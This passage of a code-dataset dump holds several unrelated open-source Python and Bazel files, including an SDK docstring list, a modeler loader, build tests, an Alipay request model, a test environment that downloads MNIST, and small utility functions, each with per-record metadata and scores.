group_index :type bucket: string :param :type object: string :param :type headers: dict :param: HTTP header Returns: HTTP Response Put object into bucket, the content of object is read from given posision of filename :type bucket: string :param :type object: string :param :type fllename: string :param: the name of the read file :type offset: int :param: the given position of file :type partsize: int :param: the size of read content :type content_type: string :param: the object content type that supported by HTTP :type headers: dict :param: HTTP header Returns: HTTP Response Upload large file, the content is read from filename. The large file is splitted into many parts. It will put the many parts into bucket and then merge all the parts into one object. :type bucket: string :param :type object: string :param :type fllename: string :param: the name of the read file :type thread_num: int :param :type max_part_num: int :param :type headers: dict :param Returns: HTTP Response #split the large file into 1000 parts or many parts #get part_msg_list #make sure all the parts are put into same bucket #get xml string that contains msg of object group Copy object :type source_bucket: string :param :type source_object: string :param :type target_bucket: string :param :type target_object: string :param :type headers: dict :param: HTTP header Returns: HTTP Response Init multi upload :type bucket: string :param :type object: string :param :type headers: dict :param: HTTP header :type params: dict :param: HTTP header Returns: HTTP Response List all upload parts of given upload_id :type bucket: string :param :type object: string :param :type upload_id: string :param :type max_parts: int :param :type part_number_marker: string :param Returns: HTTP Response List all upload_ids and their parts :type bucket: string :param :type delimiter: string :param :type max_uploads: string :param :type key_marker: string :param :type prefix: string :param :type upload_id_marker: string :param :type headers: dict :param: HTTP header Returns: HTTP Response Upload the content of filename as one part of given upload_id :type bucket: string :param :type object: string :param :type filename: string :param :type upload_id: string :param :type part_number: int :param :type headers: dict :param: HTTP header :type params: dict :param: HTTP header Returns: HTTP Response Upload the content of string as one part of given upload_id :type bucket: string :param :type object: string :param :type data: string :param :type upload_id: string :param :type part_number: int :param :type headers: dict :param: HTTP header :type params: dict :param: HTTP header Returns: HTTP Response Finish multiupload and merge all the parts in part_msg_xml as a object. :type bucket: string :param :type object: string :param :type upload_id: string :param :type part_msg_xml: string :param :type headers: dict :param: HTTP header :type params: dict :param: HTTP header Returns: HTTP Response Cancel multiupload and delete all parts of given upload_id :type bucket: string :param :type object: string :param :type upload_id: string :param :type headers: dict :param: HTTP header :type params: dict :param: HTTP header Returns: HTTP Response Upload large file, the content is read from filename. The large file is splitted into many parts. It will put the many parts into bucket and then merge all the parts into one object. :type bucket: string :param :type object: string :param :type fllename: string :param: the name of the read file :type upload_id: string :param :type thread_num: int :param :type max_part_num: int :param :type headers: dict :param :type params: dict :param Returns: HTTP Response #get init upload_id #split the large file into 1000 parts or many parts #get part_msg_list #make sure all the parts are put into same bucket #list part to get a map #get xml string that contains msg of part #complete upload Batch delete objects :type bucket: string :param: :type object_list: list :param: :type headers: dict :param: HTTP header :type params: dict :param: the parameters that put in the url address as query string Returns: HTTP Response Delete the objects in object_list_xml :type bucket: string :param: :type object_list_xml: string :param: :type headers: dict :param: HTTP header :type params: dict :param: the parameters that put in the url address as query string Returns: HTTP Response :type bucket: string :param: :type prefix: string :param: Returns: a list that contains the objects in bucket with prefix :type bucket: string :param: :type object_list: object name list :param: Returns: True or False Get object information :type bucket: string :param: :type object: string :param: :type headers: dict :param: HTTP header :type params: dict :param: the parameters that put in the url address as query string Returns: HTTP Response
1.290394
1
extrap/modelers/loader.py
Shadowjockey/extrap
0
6629023
# This file is part of the Extra-P software (http://www.scalasca.org/software/extra-p) # # Copyright (c) 2020, Technical University of Darmstadt, Germany # # This software may be modified and distributed under the terms of a BSD-style license. # See the LICENSE file in the base directory for details. import inspect import pkgutil from typing import Mapping, Type, MutableMapping from marshmallow import fields, validate from extrap.util.serialization_schema import NumberField from .abstract_modeler import AbstractModeler, ModelerSchema from .modeler_options import ModelerOption, modeler_options def load_modelers(path, pkg_name) -> MutableMapping[str, Type[AbstractModeler]]: def is_modeler(x): return inspect.isclass(x) \ and issubclass(x, AbstractModeler) \ and not inspect.isabstract(x) modelers = {} for importer, modname, is_pkg in pkgutil.walk_packages(path=path, prefix=pkg_name + '.', onerror=lambda x: None): module = importer.find_module(modname).load_module(modname) for name, clazz in inspect.getmembers(module, is_modeler): name = clazz.NAME modelers[name] = clazz create_schema(clazz) return modelers def _determine_field(option: ModelerOption): if option.range: if isinstance(option.range, range): if range.step == 1: validation = validate.Range(option.range.start, option.range.stop, max_inclusive=False) else: validation = validate.OneOf(option.range) elif isinstance(option.range, Mapping): validation = validate.OneOf(list(option.range.values()), labels=list(option.range.keys())) else: validation = validate.OneOf(option.range) else: validation = None kwargs = { 'validation': validation, 'default': option.value, 'required': False, 'allow_none': True } if option.type is int: return fields.Int(**kwargs) elif option.type is float: return NumberField(**kwargs) elif option.type is bool: return fields.Bool(**kwargs) elif option.type is str: return fields.Str(**kwargs) else: return fields.Function(serialize=str, deserialize=option.type, **kwargs) def create_schema(cls): attribute_fields = {'create_object': lambda self: cls()} for o in modeler_options.iter(cls): attribute_fields[o.field] = _determine_field(o) cls_schema = type(cls.__name__ + 'Schema', (ModelerSchema,), attribute_fields) globals()[cls_schema.__name__] = cls_schema
# This file is part of the Extra-P software (http://www.scalasca.org/software/extra-p) # # Copyright (c) 2020, Technical University of Darmstadt, Germany # # This software may be modified and distributed under the terms of a BSD-style license. # See the LICENSE file in the base directory for details. import inspect import pkgutil from typing import Mapping, Type, MutableMapping from marshmallow import fields, validate from extrap.util.serialization_schema import NumberField from .abstract_modeler import AbstractModeler, ModelerSchema from .modeler_options import ModelerOption, modeler_options def load_modelers(path, pkg_name) -> MutableMapping[str, Type[AbstractModeler]]: def is_modeler(x): return inspect.isclass(x) \ and issubclass(x, AbstractModeler) \ and not inspect.isabstract(x) modelers = {} for importer, modname, is_pkg in pkgutil.walk_packages(path=path, prefix=pkg_name + '.', onerror=lambda x: None): module = importer.find_module(modname).load_module(modname) for name, clazz in inspect.getmembers(module, is_modeler): name = clazz.NAME modelers[name] = clazz create_schema(clazz) return modelers def _determine_field(option: ModelerOption): if option.range: if isinstance(option.range, range): if range.step == 1: validation = validate.Range(option.range.start, option.range.stop, max_inclusive=False) else: validation = validate.OneOf(option.range) elif isinstance(option.range, Mapping): validation = validate.OneOf(list(option.range.values()), labels=list(option.range.keys())) else: validation = validate.OneOf(option.range) else: validation = None kwargs = { 'validation': validation, 'default': option.value, 'required': False, 'allow_none': True } if option.type is int: return fields.Int(**kwargs) elif option.type is float: return NumberField(**kwargs) elif option.type is bool: return fields.Bool(**kwargs) elif option.type is str: return fields.Str(**kwargs) else: return fields.Function(serialize=str, deserialize=option.type, **kwargs) def create_schema(cls): attribute_fields = {'create_object': lambda self: cls()} for o in modeler_options.iter(cls): attribute_fields[o.field] = _determine_field(o) cls_schema = type(cls.__name__ + 'Schema', (ModelerSchema,), attribute_fields) globals()[cls_schema.__name__] = cls_schema
en
0.838465
# This file is part of the Extra-P software (http://www.scalasca.org/software/extra-p) # # Copyright (c) 2020, Technical University of Darmstadt, Germany # # This software may be modified and distributed under the terms of a BSD-style license. # See the LICENSE file in the base directory for details.
1.890008
2
SWIM-Executables/Windows/pyinstaller-2.0 for windows/buildtests/import/test_onefile_c_extension.py
alexsigaras/SWIM
47
6629024
# # Copyright (C) 2012, <NAME> # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA # In dist directory are Python C-extension file names like module.submodule.so # E.g. ./simplejson/_speedups.so -> ./simplejson._speedups.so import os import sys from simplejson import _speedups modpath = os.path.join(sys.prefix, 'simplejson._speedups') frozen_modpath = os.path.splitext(_speedups.__file__)[0] print('Module path expected: ' + modpath) print('Module path current: ' + frozen_modpath) if not frozen_modpath == modpath: raise SystemExit('Python C-extension file name is not correct.')
# # Copyright (C) 2012, <NAME> # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA # In dist directory are Python C-extension file names like module.submodule.so # E.g. ./simplejson/_speedups.so -> ./simplejson._speedups.so import os import sys from simplejson import _speedups modpath = os.path.join(sys.prefix, 'simplejson._speedups') frozen_modpath = os.path.splitext(_speedups.__file__)[0] print('Module path expected: ' + modpath) print('Module path current: ' + frozen_modpath) if not frozen_modpath == modpath: raise SystemExit('Python C-extension file name is not correct.')
en
0.820691
# # Copyright (C) 2012, <NAME> # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA # In dist directory are Python C-extension file names like module.submodule.so # E.g. ./simplejson/_speedups.so -> ./simplejson._speedups.so
2.325927
2
db/__init__.py
TiMed-dev/TIMed-backend
0
6629025
# -*- coding: utf-8 -*- """ db module ========= Provides: 1. Asynchronous interface for connecting to a RDBMS service 2. Asynchronous execution of SQL transactions and queries How to use the documentation ---------------------------- Documentation is available in one form: docstrings provided with the code Copyright (c) 2016, <NAME>. MIT, see LICENSE for more details. """ import os import sys import dbconn __version__ = '1.0.0' __all__ = ["dbconn"] sys.path.append(os.path.join(os.path.dirname(__file__), '..', '..'))
# -*- coding: utf-8 -*- """ db module ========= Provides: 1. Asynchronous interface for connecting to a RDBMS service 2. Asynchronous execution of SQL transactions and queries How to use the documentation ---------------------------- Documentation is available in one form: docstrings provided with the code Copyright (c) 2016, <NAME>. MIT, see LICENSE for more details. """ import os import sys import dbconn __version__ = '1.0.0' __all__ = ["dbconn"] sys.path.append(os.path.join(os.path.dirname(__file__), '..', '..'))
en
0.752614
# -*- coding: utf-8 -*- db module ========= Provides: 1. Asynchronous interface for connecting to a RDBMS service 2. Asynchronous execution of SQL transactions and queries How to use the documentation ---------------------------- Documentation is available in one form: docstrings provided with the code Copyright (c) 2016, <NAME>. MIT, see LICENSE for more details.
2.011058
2
populus/config/compiler.py
mandarvaze/populus
1
6629026
<gh_stars>1-10 from __future__ import absolute_import from eth_utils import ( is_string, ) from populus.utils.module_loading import ( import_string, ) from populus.config.helpers import ( ClassImportPath, ) from .base import Config BACKEND_IDENTIFIER_MAP = { 'solc:combined-json': 'populus.compilation.backends.solc.SolcCombinedJSONBackend', 'solc:standard-json': 'populus.compilation.backends.solc.SolcStandardJSONBackend', } UNSUPPORTED_BACKEND_IDENTIFIER_MSG = ( "Unsupported type. Must be either a backend class, a dot " "separated python path to a backend class, or one of `ipc` or " "`rpc`" ) class CompilerConfig(Config): backend_class = ClassImportPath('class') def set_backend_class(self, backend_identifier): if isinstance(backend_identifier, type): self.backend_class = backend_identifier elif is_string(backend_identifier): if backend_identifier.lower() in BACKEND_IDENTIFIER_MAP: self.backend_class = BACKEND_IDENTIFIER_MAP[backend_identifier.lower()] else: try: import_string(backend_identifier) except ImportError: raise ValueError( UNSUPPORTED_BACKEND_IDENTIFIER_MSG.format(backend_identifier) ) else: self.backend_class = backend_identifier else: raise ValueError(UNSUPPORTED_BACKEND_IDENTIFIER_MSG.format(backend_identifier)) @property def backend(self): return self.backend_class(self.backend_settings) @property def backend_settings(self): return self.get('settings', {})
from __future__ import absolute_import from eth_utils import ( is_string, ) from populus.utils.module_loading import ( import_string, ) from populus.config.helpers import ( ClassImportPath, ) from .base import Config BACKEND_IDENTIFIER_MAP = { 'solc:combined-json': 'populus.compilation.backends.solc.SolcCombinedJSONBackend', 'solc:standard-json': 'populus.compilation.backends.solc.SolcStandardJSONBackend', } UNSUPPORTED_BACKEND_IDENTIFIER_MSG = ( "Unsupported type. Must be either a backend class, a dot " "separated python path to a backend class, or one of `ipc` or " "`rpc`" ) class CompilerConfig(Config): backend_class = ClassImportPath('class') def set_backend_class(self, backend_identifier): if isinstance(backend_identifier, type): self.backend_class = backend_identifier elif is_string(backend_identifier): if backend_identifier.lower() in BACKEND_IDENTIFIER_MAP: self.backend_class = BACKEND_IDENTIFIER_MAP[backend_identifier.lower()] else: try: import_string(backend_identifier) except ImportError: raise ValueError( UNSUPPORTED_BACKEND_IDENTIFIER_MSG.format(backend_identifier) ) else: self.backend_class = backend_identifier else: raise ValueError(UNSUPPORTED_BACKEND_IDENTIFIER_MSG.format(backend_identifier)) @property def backend(self): return self.backend_class(self.backend_settings) @property def backend_settings(self): return self.get('settings', {})
none
1
2.112915
2
pickle_save_load.py
DeepsMoseli/LSTMGAN-for-melody-generation
12
6629027
<reponame>DeepsMoseli/LSTMGAN-for-melody-generation import pickle # create dictionary containing all your data data = {'stim': np.array([1, 2, 3]), 'response': np.array([6, 2, 0])} # save data in pickle format with open('my_data.pickle', 'wb') as f: pickle.dump(data, f) # open data from file with open('my_data.pickle', 'rb') as f: new_data_variable = pickle.load(f) #now the data will be in dictionary new_data_variable
import pickle # create dictionary containing all your data data = {'stim': np.array([1, 2, 3]), 'response': np.array([6, 2, 0])} # save data in pickle format with open('my_data.pickle', 'wb') as f: pickle.dump(data, f) # open data from file with open('my_data.pickle', 'rb') as f: new_data_variable = pickle.load(f) #now the data will be in dictionary new_data_variable
en
0.584995
# create dictionary containing all your data # save data in pickle format # open data from file #now the data will be in dictionary new_data_variable
3.020201
3
alipay/aop/api/domain/AlipayCommerceMedicalCardQueryModel.py
snowxmas/alipay-sdk-python-all
32
6629028
#!/usr/bin/env python # -*- coding: utf-8 -*- import json from alipay.aop.api.constant.ParamConstants import * class AlipayCommerceMedicalCardQueryModel(object): def __init__(self): self._auth_code = None self._buyer_id = None self._card_org_no = None self._extend_params = None self._return_url = None self._scene = None @property def auth_code(self): return self._auth_code @auth_code.setter def auth_code(self, value): self._auth_code = value @property def buyer_id(self): return self._buyer_id @buyer_id.setter def buyer_id(self, value): self._buyer_id = value @property def card_org_no(self): return self._card_org_no @card_org_no.setter def card_org_no(self, value): self._card_org_no = value @property def extend_params(self): return self._extend_params @extend_params.setter def extend_params(self, value): self._extend_params = value @property def return_url(self): return self._return_url @return_url.setter def return_url(self, value): self._return_url = value @property def scene(self): return self._scene @scene.setter def scene(self, value): self._scene = value def to_alipay_dict(self): params = dict() if self.auth_code: if hasattr(self.auth_code, 'to_alipay_dict'): params['auth_code'] = self.auth_code.to_alipay_dict() else: params['auth_code'] = self.auth_code if self.buyer_id: if hasattr(self.buyer_id, 'to_alipay_dict'): params['buyer_id'] = self.buyer_id.to_alipay_dict() else: params['buyer_id'] = self.buyer_id if self.card_org_no: if hasattr(self.card_org_no, 'to_alipay_dict'): params['card_org_no'] = self.card_org_no.to_alipay_dict() else: params['card_org_no'] = self.card_org_no if self.extend_params: if hasattr(self.extend_params, 'to_alipay_dict'): params['extend_params'] = self.extend_params.to_alipay_dict() else: params['extend_params'] = self.extend_params if self.return_url: if hasattr(self.return_url, 'to_alipay_dict'): params['return_url'] = self.return_url.to_alipay_dict() else: params['return_url'] = self.return_url if self.scene: if hasattr(self.scene, 'to_alipay_dict'): params['scene'] = self.scene.to_alipay_dict() else: params['scene'] = self.scene return params @staticmethod def from_alipay_dict(d): if not d: return None o = AlipayCommerceMedicalCardQueryModel() if 'auth_code' in d: o.auth_code = d['auth_code'] if 'buyer_id' in d: o.buyer_id = d['buyer_id'] if 'card_org_no' in d: o.card_org_no = d['card_org_no'] if 'extend_params' in d: o.extend_params = d['extend_params'] if 'return_url' in d: o.return_url = d['return_url'] if 'scene' in d: o.scene = d['scene'] return o
#!/usr/bin/env python # -*- coding: utf-8 -*- import json from alipay.aop.api.constant.ParamConstants import * class AlipayCommerceMedicalCardQueryModel(object): def __init__(self): self._auth_code = None self._buyer_id = None self._card_org_no = None self._extend_params = None self._return_url = None self._scene = None @property def auth_code(self): return self._auth_code @auth_code.setter def auth_code(self, value): self._auth_code = value @property def buyer_id(self): return self._buyer_id @buyer_id.setter def buyer_id(self, value): self._buyer_id = value @property def card_org_no(self): return self._card_org_no @card_org_no.setter def card_org_no(self, value): self._card_org_no = value @property def extend_params(self): return self._extend_params @extend_params.setter def extend_params(self, value): self._extend_params = value @property def return_url(self): return self._return_url @return_url.setter def return_url(self, value): self._return_url = value @property def scene(self): return self._scene @scene.setter def scene(self, value): self._scene = value def to_alipay_dict(self): params = dict() if self.auth_code: if hasattr(self.auth_code, 'to_alipay_dict'): params['auth_code'] = self.auth_code.to_alipay_dict() else: params['auth_code'] = self.auth_code if self.buyer_id: if hasattr(self.buyer_id, 'to_alipay_dict'): params['buyer_id'] = self.buyer_id.to_alipay_dict() else: params['buyer_id'] = self.buyer_id if self.card_org_no: if hasattr(self.card_org_no, 'to_alipay_dict'): params['card_org_no'] = self.card_org_no.to_alipay_dict() else: params['card_org_no'] = self.card_org_no if self.extend_params: if hasattr(self.extend_params, 'to_alipay_dict'): params['extend_params'] = self.extend_params.to_alipay_dict() else: params['extend_params'] = self.extend_params if self.return_url: if hasattr(self.return_url, 'to_alipay_dict'): params['return_url'] = self.return_url.to_alipay_dict() else: params['return_url'] = self.return_url if self.scene: if hasattr(self.scene, 'to_alipay_dict'): params['scene'] = self.scene.to_alipay_dict() else: params['scene'] = self.scene return params @staticmethod def from_alipay_dict(d): if not d: return None o = AlipayCommerceMedicalCardQueryModel() if 'auth_code' in d: o.auth_code = d['auth_code'] if 'buyer_id' in d: o.buyer_id = d['buyer_id'] if 'card_org_no' in d: o.card_org_no = d['card_org_no'] if 'extend_params' in d: o.extend_params = d['extend_params'] if 'return_url' in d: o.return_url = d['return_url'] if 'scene' in d: o.scene = d['scene'] return o
en
0.352855
#!/usr/bin/env python # -*- coding: utf-8 -*-
2.06078
2
test/features/environment.py
biovault/nptsne
30
6629029
import os from six.moves import urllib from scipy.io import loadmat from behave import * import logging def parse_number(text): """ Convert parsed text into a number. :param text: Parsed text, called by :py:meth:`parse.Parser.parse()`. :return: Number instance (integer), created from parsed text. """ return int(text) # -- REGISTER: User-defined type converter (parse_type). register_type(Number=parse_number) def parse_float(text): """ Convert parsed text into a number. :param text: Parsed text, called by :py:meth:`parse.Parser.parse()`. :return: Number instance (integer), created from parsed text. """ return float(text) # -- REGISTER: User-defined type converter (parse_type). register_type(Float=parse_float) def before_all(context): console = logging.StreamHandler() console.setLevel(logging.INFO) logging.getLogger('').addHandler(console) print('Initialize environment') # Get the mnist data for testing mnist_path = 'mnist-original.mat' if not os.path.isfile(mnist_path): mnist_alternative_url = 'https://github.com/amplab/datascience-sp14/raw/master/lab7/mldata/mnist-original.mat' response = urllib.request.urlopen(mnist_alternative_url) with open(mnist_path, 'wb') as f: content = response.read() f.write(content) mnist_raw = loadmat(mnist_path) context.mnist = { 'data': mnist_raw['data'].T, 'target': mnist_raw['label'][0], 'COL_NAMES': ['label', 'data'] }
import os from six.moves import urllib from scipy.io import loadmat from behave import * import logging def parse_number(text): """ Convert parsed text into a number. :param text: Parsed text, called by :py:meth:`parse.Parser.parse()`. :return: Number instance (integer), created from parsed text. """ return int(text) # -- REGISTER: User-defined type converter (parse_type). register_type(Number=parse_number) def parse_float(text): """ Convert parsed text into a number. :param text: Parsed text, called by :py:meth:`parse.Parser.parse()`. :return: Number instance (integer), created from parsed text. """ return float(text) # -- REGISTER: User-defined type converter (parse_type). register_type(Float=parse_float) def before_all(context): console = logging.StreamHandler() console.setLevel(logging.INFO) logging.getLogger('').addHandler(console) print('Initialize environment') # Get the mnist data for testing mnist_path = 'mnist-original.mat' if not os.path.isfile(mnist_path): mnist_alternative_url = 'https://github.com/amplab/datascience-sp14/raw/master/lab7/mldata/mnist-original.mat' response = urllib.request.urlopen(mnist_alternative_url) with open(mnist_path, 'wb') as f: content = response.read() f.write(content) mnist_raw = loadmat(mnist_path) context.mnist = { 'data': mnist_raw['data'].T, 'target': mnist_raw['label'][0], 'COL_NAMES': ['label', 'data'] }
en
0.480549
Convert parsed text into a number. :param text: Parsed text, called by :py:meth:`parse.Parser.parse()`. :return: Number instance (integer), created from parsed text. # -- REGISTER: User-defined type converter (parse_type). Convert parsed text into a number. :param text: Parsed text, called by :py:meth:`parse.Parser.parse()`. :return: Number instance (integer), created from parsed text. # -- REGISTER: User-defined type converter (parse_type). # Get the mnist data for testing
2.510736
3
maven/internal/require.bzl
Globegitter/rules_maven
0
6629030
<filename>maven/internal/require.bzl def _needs_install(name, dep, hkeys=["sha256", "sha1", "tag"], verbose=0): # Does it already exist? existing_rule = native.existing_rule(name) if not existing_rule: return True # If it has already been defined and our dependency lists a # hash, do these match? If a hash mismatch is encountered, has # the user specifically granted permission to continue? for hkey in hkeys: expected = dep.get(hkey) actual = existing_rule.get(hkey) if expected: if expected != actual: msg = """ An existing {0} rule '{1}' was already loaded with a {2} value of '{3}'. Overwriting this with the requested value ('{4}'). You *should* either remove the pre-existing rule from your WORKSPACE or exclude it from loading by rules_maven. """.format(existing_rule["kind"], name, hkey, actual, expected) print(msg) else: if verbose > 1: print("Skip reload %s: %s = %s" % (name, hkey, actual)) return False # No kheys for this rule - in this case no reload; first one loaded wins. if verbose > 1: print("Skipping reload of existing target %s" % name) return False def _install(deps, verbose): """Install a list if dependencies for matching native rules. Return: list of deps that have no matching native rule. """ todo = [] for d in deps: name = d.get("name") rule = d.pop("rule", None) if not rule: fail("Missing attribute 'rule': %s" % name) if hasattr(native, rule): rule = getattr(native, rule) if verbose: print("Loading %s)" % name) rule(**d) else: d["rule"] = rule todo.append(d) return todo def require(keys, deps = {}, overrides = {}, excludes = [], verbose = 0): # # Make a list of non-excluded required deps with merged data. # required = [] for key in keys: dep = deps.get(key) if not dep: fail("Unknown workspace dependency: %s" % key) d = dict(**dep) # copy the 'frozen' object. if not key in excludes: over = overrides.get(key) data = d + over if over else d if _needs_install(key, data, verbose=verbose): data["name"] = key required.append(data) return _install(required, verbose)
<filename>maven/internal/require.bzl def _needs_install(name, dep, hkeys=["sha256", "sha1", "tag"], verbose=0): # Does it already exist? existing_rule = native.existing_rule(name) if not existing_rule: return True # If it has already been defined and our dependency lists a # hash, do these match? If a hash mismatch is encountered, has # the user specifically granted permission to continue? for hkey in hkeys: expected = dep.get(hkey) actual = existing_rule.get(hkey) if expected: if expected != actual: msg = """ An existing {0} rule '{1}' was already loaded with a {2} value of '{3}'. Overwriting this with the requested value ('{4}'). You *should* either remove the pre-existing rule from your WORKSPACE or exclude it from loading by rules_maven. """.format(existing_rule["kind"], name, hkey, actual, expected) print(msg) else: if verbose > 1: print("Skip reload %s: %s = %s" % (name, hkey, actual)) return False # No kheys for this rule - in this case no reload; first one loaded wins. if verbose > 1: print("Skipping reload of existing target %s" % name) return False def _install(deps, verbose): """Install a list if dependencies for matching native rules. Return: list of deps that have no matching native rule. """ todo = [] for d in deps: name = d.get("name") rule = d.pop("rule", None) if not rule: fail("Missing attribute 'rule': %s" % name) if hasattr(native, rule): rule = getattr(native, rule) if verbose: print("Loading %s)" % name) rule(**d) else: d["rule"] = rule todo.append(d) return todo def require(keys, deps = {}, overrides = {}, excludes = [], verbose = 0): # # Make a list of non-excluded required deps with merged data. # required = [] for key in keys: dep = deps.get(key) if not dep: fail("Unknown workspace dependency: %s" % key) d = dict(**dep) # copy the 'frozen' object. if not key in excludes: over = overrides.get(key) data = d + over if over else d if _needs_install(key, data, verbose=verbose): data["name"] = key required.append(data) return _install(required, verbose)
en
0.893348
# Does it already exist? # If it has already been defined and our dependency lists a # hash, do these match? If a hash mismatch is encountered, has # the user specifically granted permission to continue? An existing {0} rule '{1}' was already loaded with a {2} value of '{3}'. Overwriting this with the requested value ('{4}'). You *should* either remove the pre-existing rule from your WORKSPACE or exclude it from loading by rules_maven. # No kheys for this rule - in this case no reload; first one loaded wins. Install a list if dependencies for matching native rules. Return: list of deps that have no matching native rule. # # Make a list of non-excluded required deps with merged data. # # copy the 'frozen' object.
1.943064
2
dito/utils.py
dhaase-de/dito
0
6629031
<gh_stars>0 import collections import datetime import errno import os import tempfile import cv2 import numpy as np #### #%%% OpenCV-related #### def cv2_version(): return tuple(int(value) for value in cv2.__version__.split(".")) #### #%%% checks #### def get_validated_tuple(x, type_, count, min_value=None, max_value=None): error_text = "Argument must be a scalar or a {}-tuple/list of type '{}' (min_value={}, max_value={})".format(count, type_, min_value, max_value) # check tuple/list if isinstance(x, tuple): pass elif isinstance(x, list): x = tuple(x) elif isinstance(x, type_): x = (x,) * count else: raise ValueError(error_text) # check length if len(x) != count: raise ValueError(error_text) # check value ranges for value in x: if ((min_value is not None) and (value < min_value)) or ((max_value is not None) and (value > max_value)): raise ValueError(error_text) return x #### #%%% number-related #### def adaptive_round(number, digit_count=4): """ Rounds a number to the first `digit_count` digits after the appearance of the first non-zero digit. This function supports Python `float`s and `int`s as well as NumPy scalars of any type (e.g., `np.float32`, `np.uint8`, etc.). """ with np.errstate(divide="ignore"): try: magnitude = np.floor(np.log10(np.abs(number))) except ValueError: magnitude = 0 if not np.isfinite(magnitude): magnitude = 0 round_digit_count = int(digit_count - magnitude - 1) return round(number, round_digit_count) #### #%%% file-related #### def mkdir(dirname): """ Create the given directory if it does not already exist. """ if dirname == "": return try: os.makedirs(dirname) except OSError as e: if e.errno != errno.EEXIST: raise def get_temp_dir(prefix): """ Creates and returns temporary directory. The property `.name` holds the path. It can be deleted using the `.cleanup()` method. """ return tempfile.TemporaryDirectory(prefix=prefix) def human_bytes(byte_count): """ Formats a given `byte_count` into a human-readable string. """ prefixes = collections.OrderedDict() prefixes["KiB"] = 1024.0**1 prefixes["MiB"] = 1024.0**2 prefixes["GiB"] = 1024.0**3 count = byte_count unit = "bytes" for (new_unit, new_scale) in prefixes.items(): new_count = byte_count / new_scale if new_count < 1.0: break else: count = new_count unit = new_unit if isinstance(count, int): # count is an integer -> use no decimal places return "{} {}".format(count, unit) else: # count is a float -> use two decimal places return "{:.2f} {}".format(count, unit) #### #%%% output-related #### def now_str(mode="compact", date=True, time=True, microtime=True): """ Return the current date and/or time as string. """ # check arguments if not (date or time or microtime): raise ValueError("At least one of 'date', 'time', 'microtime' must be `True`") # select format string parts based on mode if mode == "compact": date_fmt = "%Y%m%d" time_sep = "_" time_fmt = "%H%M%S" micro_sep = "_" micro_fmt = "%f" elif mode == "readable": date_fmt = "%Y-%m-%d" time_sep = "__" time_fmt = "%H-%M-%S" micro_sep = "__" micro_fmt = "%f" elif mode == "print": date_fmt = "%Y-%m-%d" time_sep = " " time_fmt = "%H:%M:%S" micro_sep = "." micro_fmt = "%f" else: raise ValueError("Invalid mode '{}".format(mode)) # build final format string fmt = "" if date: fmt += date_fmt if time: if fmt != "": fmt += time_sep fmt += time_fmt if microtime: if fmt != "": fmt += micro_sep fmt += micro_fmt # return formatted date and/or time return datetime.datetime.now().strftime(fmt) def ftable(rows, first_row_is_header=False): """ Format the data specified in `rows` as table string. """ col_sep = " " sep_symbol = "-" # count the max length for each column col_count = max(len(row) for row in rows) col_lengths = [0] * col_count for row in rows: for n_col in range(col_count): col_lengths[n_col] = max(col_lengths[n_col], len(str(row[n_col]))) # the line at the top and bottom sep_line = col_sep.join(sep_symbol * col_length for col_length in col_lengths) # transform rows into lines lines = [] lines.append(sep_line) for (n_row, row) in enumerate(rows): col_strs = [] for (col_length, col) in zip(col_lengths, row): col_str = "{{: <{}}}".format(col_length).format(str(col)) col_strs.append(col_str) lines.append(col_sep.join(col_strs)) if first_row_is_header and (n_row == 0): lines.append(sep_line) lines.append(sep_line) # return table as single string return "\n".join(lines) def ptable(rows, ftable_kwargs=None, print_kwargs=None): """ Print the data specified in `rows` as table. """ if ftable_kwargs is None: ftable_kwargs = {} if print_kwargs is None: print_kwargs = {} print(ftable(rows=rows, **ftable_kwargs), **print_kwargs)
import collections import datetime import errno import os import tempfile import cv2 import numpy as np #### #%%% OpenCV-related #### def cv2_version(): return tuple(int(value) for value in cv2.__version__.split(".")) #### #%%% checks #### def get_validated_tuple(x, type_, count, min_value=None, max_value=None): error_text = "Argument must be a scalar or a {}-tuple/list of type '{}' (min_value={}, max_value={})".format(count, type_, min_value, max_value) # check tuple/list if isinstance(x, tuple): pass elif isinstance(x, list): x = tuple(x) elif isinstance(x, type_): x = (x,) * count else: raise ValueError(error_text) # check length if len(x) != count: raise ValueError(error_text) # check value ranges for value in x: if ((min_value is not None) and (value < min_value)) or ((max_value is not None) and (value > max_value)): raise ValueError(error_text) return x #### #%%% number-related #### def adaptive_round(number, digit_count=4): """ Rounds a number to the first `digit_count` digits after the appearance of the first non-zero digit. This function supports Python `float`s and `int`s as well as NumPy scalars of any type (e.g., `np.float32`, `np.uint8`, etc.). """ with np.errstate(divide="ignore"): try: magnitude = np.floor(np.log10(np.abs(number))) except ValueError: magnitude = 0 if not np.isfinite(magnitude): magnitude = 0 round_digit_count = int(digit_count - magnitude - 1) return round(number, round_digit_count) #### #%%% file-related #### def mkdir(dirname): """ Create the given directory if it does not already exist. """ if dirname == "": return try: os.makedirs(dirname) except OSError as e: if e.errno != errno.EEXIST: raise def get_temp_dir(prefix): """ Creates and returns temporary directory. The property `.name` holds the path. It can be deleted using the `.cleanup()` method. """ return tempfile.TemporaryDirectory(prefix=prefix) def human_bytes(byte_count): """ Formats a given `byte_count` into a human-readable string. """ prefixes = collections.OrderedDict() prefixes["KiB"] = 1024.0**1 prefixes["MiB"] = 1024.0**2 prefixes["GiB"] = 1024.0**3 